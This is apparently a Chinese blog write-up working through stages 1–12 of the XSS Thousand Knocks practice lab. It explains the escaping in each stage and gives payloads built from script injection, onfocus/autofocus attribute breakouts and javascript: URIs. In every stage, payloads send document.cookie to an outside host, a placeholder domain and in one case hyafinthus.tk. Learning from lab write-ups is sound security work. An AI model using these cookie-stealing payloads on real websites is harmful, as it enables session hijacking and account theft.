在学完 Sqli-Labs 之后一直想学 XSS,总是因各种事情耽搁,还因为自己太懒了。
然后每打一次比赛都能深刻感受到自己的菜,每次都告诫自己不能再这样下去了。
搭了自己的 VPS 和博客之后觉得 WordPress 也么有想象中的那么好用,有学习笔记啥的还是放在简书上,也许以后那边会放些 WP。
XSS Thousand Knocks 是一个练习 XSS 的平台,看到夏语的博客里说这个比先知挑战赛的质量差很多,先拿来作为入门练习吧。
做这些题你需要一个有公网 IP 的 VPS,你成功做出题后服务器会把 flag 打到你的服务器上,通过查看 VPS 的日志获取 flag。
我的 VPS 是用宝塔 Linux 面板一键安装的Nginx,它的日志路径是/www/wwwlogs/domain.log,使用tail -f domain.log -n 20实时查看日志的最后 20 行。
XSS 的笔记会比 Sqli 的少很多,所以大概一篇就够了。
0x01. Stage 01:开篇引导
这是一个引导关,在给你的每一个关卡链接中找到 XSS 漏洞,再将 payload 的相应部分换成location=%22http://domain/?%22%2Bdocument.cookie填入下方的URL form,然后在 VPS 的日志里找到 flag。
?alert(1)
?location=%22http://domain/?%22%2Bdocument.cookie
0x02. Stage 02 - 06:尖括号闭合
Stage 02
?q=XSS
XSS
?q=<script>alert(1)</script>
?q=<script>location=%22http://domain/?%22%2Bdocument.cookie</script>
Stage 03
?q=XSS
<a href="/q=XSS">Link</a>
?q="/><script>alert(1)</script><a>
?q="/><script>location=%22http://domain/?%22%2Bdocument.cookie</script><a>
Stage 04
?q=XSS
<a href='/q=XSS'>Link</a>
?q='/><script>alert(1)</script><a>
?q='/><script>location=%22http://domain/?%22%2Bdocument.cookie</script><a>
Stage 05
?q=XSS
<textarea>XSS<textarea>
?q=</textarea><script>alert(1)</script><textarea>
?q=</textarea><script>location=%22http://domain/?%22%2Bdocument.cookie</script><textarea>
Stage 06
?q=XSS
<xmp>XSS</xmp>
?q=</xmp><script>alert(1)</script><xmp>
?q=</xmp><script>location=%22http://domain/?%22%2Bdocument.cookie</script><xmp>
0x03. Stage 07 - 09:<input>标签
Stage 07:转义尖括号
?q=XSS
<input type="text" value="XSS">
发现尖括号被转义了:
?q="><script>alert(1)</script>
<input type="text" value="">%lt;script>alert(1)</script>">
使用<input>标签的autofocus和onfucus属性,autofocus规定在页面加载时,域自动地获得焦点。
?q="+onfocus="alert(1)"+autofocus="
?q="+onfocus="location='http://hyafinthus.tk/?'%2Bdocument.cookie"+autofocus="
Stage 08:转义双引号
?q=XSS
<input type='text' value='XSS'>
发现尖括号还是被转义:
?q='><script>alert(1)</script>
<input type='text' value=''><script>alert(1)</script>'>
尝试 Stage 07 中的onfocus发现双引号也被转义:
?q='+onfocus="location='http://domain/?'%2Bdocument.cookie"+autofocus='
<input type='text' value='' onfocus="location='http://domain/?'+document.cookie" autofocus=''>
尝试将onfocus的引号去掉:
?q='+onfocus=location='http://domain/?'%2Bdocument.cookie+autofocus='
Stage 09
?q=XSS
<input type=text value=XSS>
这里发现虽然单双引号被转义但是还是能够跳转的,Stage 07 和 08 同:
?q=''+onfocus=location='http://domain/?'%2Bdocument.cookie+autofocus='
<input type=text value='' onfocus=location='http://domain/?'+document.cookie autofocus>
0x04. Stage 10 - 12:js伪协议
Stage 10
?q=XSS
<frameset><frame src="[XSS]"></frameset>
发现尖括号和双引号被转义:
?q="/><script>alert(1)</script>
<frameset><frame src="["/><script>alert(1)</script>]"></frameset>
查到这里应该用伪协议:
真协议用来在计算机之间传输数据包,如 http 协议,ftp 协议;伪协议是一种非标准化的协议,让使用者可以通过链接来调用 js 函数。
?q=javascript:alert(1)
?q=javascript:location='http://domain/?'%2Bdocument.cookie
Stage11
?q=XSS
<iframe src="[XSS]"></iframe>
?q=javascript:alert(1)
?q=javascript:location='http://domain/?'%2Bdocument.cookie
Stage 12
?q=XSS
<iframe src="[XSS]"></iframe>
但是被拦截了:
?q=javascript:location='http://domain/?'%2Bdocument.cookie
对服务器的请求已遭到某个扩展程序的阻止。
尝试将location=换成window.open():
?q=javascript:window.open('http://domain/?'%2Bdocument.cookie)
如果单引号'被过滤也可以换成反引号`。这里还有另一种 payload:https://lugrria.gitbook.io/writeup/xss-thousand-knocks/stage12
网友评论